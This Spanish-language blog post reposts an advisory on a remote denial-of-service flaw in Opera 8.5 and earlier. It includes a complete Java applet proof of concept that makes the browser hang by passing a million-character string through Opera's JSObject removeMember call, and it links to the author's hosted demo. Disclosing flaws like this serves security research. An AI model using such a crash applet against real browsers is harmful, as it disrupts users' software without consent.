Opera Web Browser JNI Routine Handling Remote Denial of Service Vulnerability
version Vulnerable 8.5 y anteriores
Detalles:
----------
El Navegador ópera es propenso a un remote denial of service
El problema se presenta cuando el navegador maneja un applet de Java que contiene una rutina de JNI.
Un ataque exitoso puede causar que el navegador se ¨cuelgue¨.
Prueba de Concepto:
------------------------
import java.applet.Applet;
import java.awt.Graphics;
import netscape.javascript.JSObject;
public class OperaTest extends Applet{
static {
System.out.println("Loaded 1.2");
}
public void paint(Graphics g) {
System.out.println("start");
try {
netscape.javascript.JSObject jso = JSObject.getWindow(this);
System.out.println(jso.getClass());
com.opera.JSObject j = (com.opera.JSObject ) jso;
char[] x = new char[1000000];
for (int y = 0 ; y < x.length; y++) {
x [y] = 'A';
}
String z = new String(x);
System.out.println("after evalb");
j.removeMember(z);
System.out.println("after remove");
}
catch (Exception e) {
e.printStackTrace();
}
}
}
Mi Prueba de Concepto (utilizando applet)
http://ciberia.ya.com/webmousehack/OperaCrash.html
Fuente:packetstorm
Salu2
publicado por Mousehack a las 7:52 p. m.
0 Comments:
Publicar un comentario
<< Home